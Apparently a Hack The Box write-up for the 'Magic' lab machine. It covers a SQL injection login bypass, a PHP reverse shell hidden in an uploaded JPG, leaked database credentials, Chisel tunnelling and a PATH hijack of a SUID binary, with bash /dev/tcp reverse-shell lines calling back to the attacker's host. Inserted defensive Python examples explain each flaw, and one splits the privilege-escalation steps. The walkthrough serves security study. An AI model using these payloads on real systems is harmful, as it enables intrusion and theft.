HTB Magic done
Magic
OS:
Linux
Technology:
IP Address:
10.10.10.185
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Users and passwords:
From config file: db.php5
L: theseus
P: iamkingtheseus
---
Inside database Magic
L: admin
P: Th3s3usW4sK1ng
---
SSH creds for user: theseus
L: theseus
P: Th3s3usW4sK1ng
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.185_nmap 10.10.10.185 ; cat 10.10.10.185_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 13:24 UTC
Nmap scan report for 10.10.10.185
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Ffuf: http://10.10.10.185/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ ffuf -u http://10.10.10.185/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.10.185_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.185/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : 10.10.10.185_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.10.10.185/assets/FUZZ
images [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://10.10.10.185/images/FUZZ
index.php [Status: 200, Size: 4055, Words: 491, Lines: 60, Duration: 33ms]
login.php [Status: 200, Size: 4221, Words: 1179, Lines: 118, Duration: 40ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
upload.php [Status: 302, Size: 2957, Words: 814, Lines: 85, Duration: 34ms]
[INFO] Starting queued job on target: http://10.10.10.185/assets/FUZZ
css [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/assets/css/
js [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/assets/js/
[INFO] Starting queued job on target: http://10.10.10.185/images/FUZZ
uploads [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 40ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/images/uploads/
:: Progress: [122814/122814] :: Job [3/3] :: 1149 req/sec :: Duration: [0:01:59] :: Errors: 0 ::
Open website: http://10.10.10.185/login.php
I found SQLi in the login form
Payload: admin' or 1=1 --
---
Request - Burp
___
POST /login.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://10.10.10.185
Connection: keep-alive
Referer: http://10.10.10.185/login.php
Cookie: PHPSESSID=aaa
Upgrade-Insecure-Requests: 1
username=admin'%20or%201=1--%20&password=admin'%20or%201=1--%20
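Why the payload above logs in as admin, shown on a constructed copy of the login table (an added example, not code from the box or the write-up; the table layout follows the SELECT output later in these notes and the stored password is a placeholder):

```python
import sqlite3

# Constructed stand-in for the box's `login` table (id, username, password).
# The password is a placeholder, not the value from the write-up.
SAMPLE_ROWS = [(1, "admin", "placeholder-password")]

# The form values from the Burp request above, URL-decoded.
INJECTED = "admin' or 1=1-- "


def make_db():
    """In-memory copy of the login table so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO login VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def rendered_sql(username, password):
    """The statement a string-concatenating login page actually executes."""
    return (f"SELECT username FROM login WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(con, username, password):
    """Concatenated query: the quote in the input closes the literal,
    `or 1=1` makes the WHERE clause always true and `--` comments out the
    password comparison. Returns the matched username or None."""
    row = con.execute(rendered_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(con, username, password):
    """Bound parameters: the driver passes the input as data, never as SQL,
    so the same payload is compared literally against the column values."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

`rendered_sql(INJECTED, INJECTED)` prints the exact statement the server ran, which is the quickest way to explain the finding in a report.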
Create a revshell via jpg file
Payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'"); ?>
---
Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
---
Create file with revshell
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ cat revshell.php.jpg | tail -n 2
z9Ώ�&�Z�����N1?z����D\���prF��N
:U��@���(����Xg,LŘ)R�&�8���x����F
�E�f!h�;E�&��~"�U�Es��.�!.Dy��k�O�� �X�!�����0�1�PQP�IW~�!0�����/��.s)
NQ!���b�sy�)-����
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'"); ?>
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
---
Upload file
___
http://10.10.10.185/upload.php
---
Open file from website
___
http://10.10.10.185/images/uploads/revshell.php.jpg
Open config file: db.php5
I found the database credentials in it:
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
---
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}
www-data@magic:/var/www/Magic$ cat .htaccess
cat .htaccess
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
<Files ~ "\.(sh|sql)">
order deny,allow
deny from all
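The FilesMatch regex above is why revshell.php.jpg runs as PHP: Apache applies it unanchored, so ".php" anywhere in the name is enough. As an added example (not code from the box or the write-up), the same regex beside an anchored one, and a hardened upload check; the image signatures and the random-name policy are assumptions:

```python
import os
import re
import secrets

# Pattern copied from the box's .htaccess. Apache applies FilesMatch without
# anchoring, so ".php" followed by anything (e.g. ".jpg") still reaches PHP.
HTACCESS_PHP = re.compile(r".+\.ph(p([3457s]|\-s)?|t|tml)")

# Hardened pattern: the PHP-ish extension must be the last thing in the name.
ANCHORED_PHP = re.compile(r".+\.ph(p([3457s]|\-s)?|t|tml)$")

# Whitelisted upload types and their leading magic bytes (assumed policy).
IMAGE_SIGNATURES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}


def handed_to_php(pattern, filename):
    """True if Apache would route `filename` to the PHP handler under `pattern`."""
    return pattern.search(filename) is not None


def php_tag_offset(data):
    """Offset of an embedded PHP open tag, or -1. Image data has no business
    containing one, so this is a cheap detection signal for polyglot uploads."""
    return data.find(b"<?php")


def validate_upload(client_name, data):
    """Decide whether to store an upload. Returns (stored_name, reason), with
    stored_name None on rejection. Rules:
      - only the final suffix counts, and it must be whitelisted;
      - the bytes must start with that type's signature;
      - no PHP open tag anywhere in the content;
      - the on-disk name is random, so the client-chosen name never reaches
        the filesystem and therefore never reaches the handler regex."""
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return None, f"extension {ext!r} not allowed"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return None, "content does not match declared type"
    if php_tag_offset(data) != -1:
        return None, "PHP open tag inside image data"
    return secrets.token_hex(16) + ext, "ok"


# Constructed samples: a JPEG header with a PHP tag appended, named like the
# file in the write-up, and a clean header for comparison.
POLYGLOT_NAME = "revshell.php.jpg"
POLYGLOT_DATA = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"<?php echo 1; ?>"
CLEAN_DATA = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
```

The content checks catch this particular file, but the durable fix is the anchored regex (or no PHP handler at all under images/uploads), since a polyglot can hide its tag in ways a byte search misses.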
Create a tunnel via Chisel
Download Chisel
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz .
--2024-08-30 06:49:28-- https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/b64ec114-628a-4a86-bc09-5e26486611f9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T070025Z&X-Amz-Expires=300&X-Amz-Signature=f5042f364eac27604755cbf1a5c4fa32ffc3904d769abd157807a81d95548a7f&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=31311037&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.0_linux_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2024-08-30 06:49:29-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/b64ec114-628a-4a86-bc09-5e26486611f9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T070025Z&X-Amz-Expires=300&X-Amz-Signature=f5042f364eac27604755cbf1a5c4fa32ffc3904d769abd157807a81d95548a7f&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=31311037&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.0_linux_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3725506 (3.6M) [application/octet-stream]
Saving to: ‘chisel_1.10.0_linux_amd64.gz’
chisel_1.10.0_linux_amd64.gz 100%[==============================================>] 3.55M 13.2MB/s in 0.3s
2024-08-30 06:49:30 (13.2 MB/s) - ‘chisel_1.10.0_linux_amd64.gz’ saved [3725506/3725506]
--2024-08-30 06:49:30-- http://./
Resolving . (.)... failed: No address associated with hostname.
wget: unable to resolve host address ‘.’
FINISHED --2024-08-30 06:49:35--
Total wall clock time: 6.5s
Downloaded: 1 files, 3.6M in 0.3s (13.2 MB/s)
Upload to remote host
Start Python server
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ gunzip chisel_1.10.0_linux_amd64.gz
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ file chisel_1.10.0_linux_amd64
chisel_1.10.0_linux_amd64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=ZF9H7gK7fgkOTwWLrI1u/-1VhXiD0POv-x8Lyrr1A/TUEl2n4dbOopyLnv6sqH/gThkUIP-d9izNz4uWNR4, stripped
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.185 - - [30/Aug/2024 06:50:07] "GET /chisel_1.10.0_linux_amd64 HTTP/1.1" 200 -
---
Download Chisel on remote host
___
www-data@magic:/tmp$ wget http://10.10.14.25/chisel_1.10.0_linux_amd64 .
wget http://10.10.14.25/chisel_1.10.0_linux_amd64 .
--2024-08-30 00:01:19-- http://10.10.14.25/chisel_1.10.0_linux_amd64
Connecting to 10.10.14.25:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8945816 (8.5M) [application/octet-stream]
Saving to: 'chisel_1.10.0_linux_amd64'
chisel_1.10.0_linux 100%[===================>] 8.53M 3.31MB/s in 2.6s
2024-08-30 00:01:21 (3.31 MB/s) - 'chisel_1.10.0_linux_amd64' saved [8945816/8945816]
--2024-08-30 00:01:21-- http://./
Resolving . (.)... failed: Name or service not known.
wget: unable to resolve host address '.'
FINISHED --2024-08-30 00:01:21--
Total wall clock time: 2.7s
Downloaded: 1 files, 8.5M in 2.6s (3.31 MB/s)
www-data@magic:/tmp$
www-data@magic:/tmp$
Chisel - tunneling
Kali Linux - Client Chisel
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ ./chisel_1.10.0_linux_amd64 client 10.10.10.185:9000 127.0.0.1:3306:127.0.0.1:3306
2024/08/30 08:35:59 client: Connecting to ws://10.10.10.185:9000
2024/08/30 08:35:59 client: tun: proxy#127.0.0.1:3306=>3306: Listening
2024/08/30 08:35:59 client: Connected (Latency 30.834013ms)
---
Victim - Server Chisel
___
www-data@magic:/tmp$ ./chisel_1.10.0_linux_amd64 server --socks5 --port 9000
./chisel_1.10.0_linux_amd64 server --socks5 --port 9000
2024/08/30 01:46:27 server: Fingerprint 0ZIuXQgXq9+uFHmmRKRBJTBP0+3/CI32JDXjPdSr+oQ=
2024/08/30 01:46:27 server: Listening on http://0.0.0.0:9000
Read database: Magic
I found creds:
L: admin
P: Th3s3usW4sK1ng
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ mysql -h 127.0.0.1 -u theseus -piamkingtheseus -D Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 49
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login |
+-----------------+
1 row in set (0.031 sec)
MySQL [Magic]> SELECT * FROM login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.031 sec)
MySQL [Magic]>
Read flag: user.txt
Creds:
L: theseus
P: Th3s3usW4sK1ng
---
www-data@magic:/var/www/Magic/images/uploads$ whereis python
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /usr/lib/python3.8 /etc/python2.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/include/python3.6m /usr/share/python
www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@magic:/var/www/Magic/images/uploads$ find / -name "user.txt" 2>/dev/null ; find / -name "local.txt" 2>/dev/null
< 2>/dev/null ; find / -name "local.txt" 2>/dev/null
/home/theseus/user.txt
theseus@magic:/var/www/Magic/images/uploads$ cd /home/theseus
cd /home/theseus
theseus@magic:~$ ls -a
ls -a
. .bash_profile Desktop .ICEauthority Public Videos
.. .bashrc Documents .local .ssh
.bash_history .cache Downloads Music Templates
.bash_logout .config .gnupg Pictures user.txt
theseus@magic:~$
theseus@magic:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
7c90d693eafd3e9c9488a11639a4564f
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:8e:92 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.185/23 brd 10.10.11.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:8e92/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:8e92/64 scope link
valid_lft forever preferred_lft forever
theseus@magic:~$
Privilege Escalation
Find SUID file
I found an interesting app: /bin/sysinfo
---
theseus@magic:~$ find / -perm /4000 2>/dev/null | grep -Ev "core|lib"
find / -perm /4000 2>/dev/null | grep -Ev "core|lib"
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
Checking details about /bin/sysinfo
/bin/sysinfo is SUID root and every user in group "users" can run it. The app runs a few system commands such as fdisk, lshw and cat /proc/cpuinfo, calling each by bare name, so they are resolved through the caller's PATH.
---
theseus@magic:~$ ls -la /bin/sysinfo
ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
theseus@magic:~$
theseus@magic:~$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@magic:~$
theseus@magic:~$ strings /bin/sysinfo
strings /bin/sysinfo
libc.so.6
setuid
__stack_chk_fail
popen
fgets
__cxa_atexit
pclose
__cxa_finalize
setgid
__libc_start_main
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
theseus@magic:~$
Revshell
Start netcat
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.185] 38448
root@magic:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
Create revshell
theseus@magic:/tmp$ echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'" > /tmp/lshw
<sh -i >& /dev/tcp/10.10.14.25/80 0>&1'" > /tmp/lshw
theseus@magic:/tmp$ chmod a+rwx /tmp/lshw
chmod a+rwx /tmp/lshw
Change PATH variable
theseus@magic:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@magic:/tmp$
Run /bin/sysinfo
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
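Why the PATH change above works, and what to audit for: an added Python check (not from the write-up) that flags bare-name commands in a setuid binary's strings, using a constructed excerpt of the sysinfo output, and shows that a world-writable directory first in PATH shadows the real program while a fixed PATH does not. The heuristic in relative_commands and the SPAWNERS set are assumptions.

```python
import os
import stat
import tempfile

# Excerpt of `strings /bin/sysinfo` from the write-up (constructed subset).
SYSINFO_STRINGS = """\
setuid
popen
popen() failed!
====================Hardware Info====================
lshw -short
fdisk -l
cat /proc/cpuinfo
free -h
"""
# libc entry points that hand a command line to /bin/sh or search PATH.
SPAWNERS = {"popen", "system", "execvp", "execlp", "execvpe"}

def relative_commands(strings_output):
    """Heuristic: two or more tokens whose first token looks like a program
    name without a '/' is a command that will be resolved through PATH."""
    cmds = []
    for line in strings_output.splitlines():
        tokens = line.split()
        if len(tokens) < 2:
            continue
        prog = tokens[0].replace("-", "").replace("_", "")
        if tokens[0].startswith("/") or not prog.isalnum():
            continue
        cmds.append(line.strip())
    return cmds

def path_hijack_risk(strings_output):
    """True when the binary spawns children through the shell or PATH and
    names at least one program relatively, which is the pattern sysinfo shows."""
    spawns = bool(set(strings_output.split()) & SPAWNERS)
    return spawns and bool(relative_commands(strings_output))

def resolve(command, path):
    """The lookup /bin/sh performs for a bare name: the first PATH entry
    holding a regular file with an execute bit wins."""
    prog = command.split()[0]
    for d in path.split(os.pathsep):
        cand = os.path.join(d, prog)
        try:
            st = os.stat(cand)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
            return cand
    return None

def world_writable_dirs(path):
    """PATH entries any user can write to; a setuid program must not search them."""
    return [d for d in path.split(os.pathsep)
            if os.path.isdir(d) and os.stat(d).st_mode & stat.S_IWOTH]

def demo_shadowing():
    """Plant a harmless fake lshw in a /tmp-like directory and compare lookups."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o1777)          # world-writable + sticky, like /tmp
        fake = os.path.join(tmp, "lshw")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho shadowed\n")
        os.chmod(fake, 0o755)
        fixed = "/usr/sbin:/usr/bin:/sbin:/bin"
        return (resolve("lshw -short", f"{tmp}:{fixed}") == fake,
                resolve("lshw -short", fixed) != fake,
                tmp in world_writable_dirs(f"{tmp}:{fixed}"))
```

The fix on the binary side is to call the tools by absolute path (or reset PATH to a fixed value before popen), and on the policy side to keep setuid programs from being runnable by a broad group at all.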
Read flag: root.txt
root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls -a
ls -a
.
..
.bash_history
.bash_profile
.bashrc
.cache
.gnupg
info.c
.local
root.txt
snap
root@magic:/root# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
47d887303cfb2de3b32de4984c33726d
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:8e:92 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.185/23 brd 10.10.11.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:8e92/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:8e92/64 scope link
valid_lft forever preferred_lft forever
root@magic:/root#
References
[Chisel_1.10.0_linux](https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz)
Lessons Learned